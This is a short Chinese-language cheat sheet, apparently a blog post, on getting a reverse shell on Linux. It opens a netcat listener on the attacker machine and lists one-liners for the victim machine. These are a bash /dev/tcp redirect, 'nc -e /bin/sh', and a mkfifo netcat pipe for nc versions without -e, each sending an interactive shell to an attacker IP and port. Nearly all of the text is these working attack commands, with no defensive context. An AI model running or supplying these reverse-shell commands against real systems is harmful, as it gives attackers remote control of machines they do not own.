本机【攻击机】开启nc监听:nc -lvnp 9999
受害机器反弹shell《两种常见反弹shell》
1.bash反弹
bash -i >& /dev/tcp/ip_address/port 0>&1
bash -c “bash -i >& /dev/tcp/192.168.0.189/9999 0>&1”
2.nc反弹
nc -e /bin/sh 192.168.2.130 4444
但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.189 9999>/tmp/f
linux使用nc 反弹shell
于 2023-04-20 11:37:06 首次发布